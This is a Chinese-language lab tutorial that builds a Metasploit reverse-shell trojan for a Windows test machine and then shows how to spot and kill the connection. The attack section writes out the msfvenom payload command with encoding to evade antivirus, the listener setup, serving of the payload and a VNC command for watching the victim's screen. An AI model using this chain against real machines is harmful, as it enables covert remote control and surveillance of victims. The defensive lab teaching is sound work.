# 木马实战演示

> **准备:**
>
> 1. 一台Windows靶机
> 2. 一台Kali攻击机



# 攻击部分

## 1. 制作简单的payload

1. 进入kali后``/var/www/html `, 之后输入:

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.191.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe
```

2. `payload.exe `生成好后, 在kali中直接输入

   ```
   msfconsole
   ```

3. 接着依次输入:

   ```
   use exploit/multi/handler 
   
   set payload windows/meterpreter/reverse_tcp
   
   show options 
   
   set lhost 192.168.191.129
   
   set lport 4444
   ```

## 2. 开启服务

再打开一个kalii终端, 输入:

```
systemctl start apache2
```



## 3. Windows访问Kali, 并加载payload

直接用 **Windows**访问 Kali的ip地址就行

![image-20230710065821113](https://raw.githubusercontent.com/QDGSCLOUD/BJYH_picture/main/img/image-20230710065821113.png)

出现上面的界面就说明, Kali的apaceh服务开启来了, 下面让Windows来下载payload.exe

直接在浏览器中输入: `192.168.191.129/payload.exe`

> **注意关闭Windows靶机的防火墙**



## 4. 建立连接

> 此时回到Kali的`msfconsole`的终端窗口, 直接输入 `run`
>
> ![image-20230710071507070](https://raw.githubusercontent.com/QDGSCLOUD/BJYH_picture/main/img/image-20230710071507070.png)
>
> 成功建立连接.



## 之后简单的操作

如果想要看到Windows靶机的任何监控, 直接输入:

```
run vnc
```

这样靶机上的任何操作, 都会显示在Kali上了.

![image-20230710072049166](https://raw.githubusercontent.com/QDGSCLOUD/BJYH_picture/main/img/image-20230710072049166.png)





# 防守部分

1. 可以直接在Windows的终端中输入:

   ```
   netstat -ano
   ```

   此时可以看到我们建立的非正常连接

   ![image-20230710072504120](https://raw.githubusercontent.com/QDGSCLOUD/BJYH_picture/main/img/image-20230710072504120.png)

> **可以看到此处有两个进程, 一个是 4545 , 一个是 4444**, 这两个都必须结束才行, **只删除 一个, Kali仍然能看到**



2. 还可以查看 **任务管理器**的详细信息

> ![image-20230710072714899](https://raw.githubusercontent.com/QDGSCLOUD/BJYH_picture/main/img/image-20230710072714899.png)
>
> 此时可以直接右键, 结束进程. 然后, 找到 **4545端口对应的进程**, 也右键结束才行.







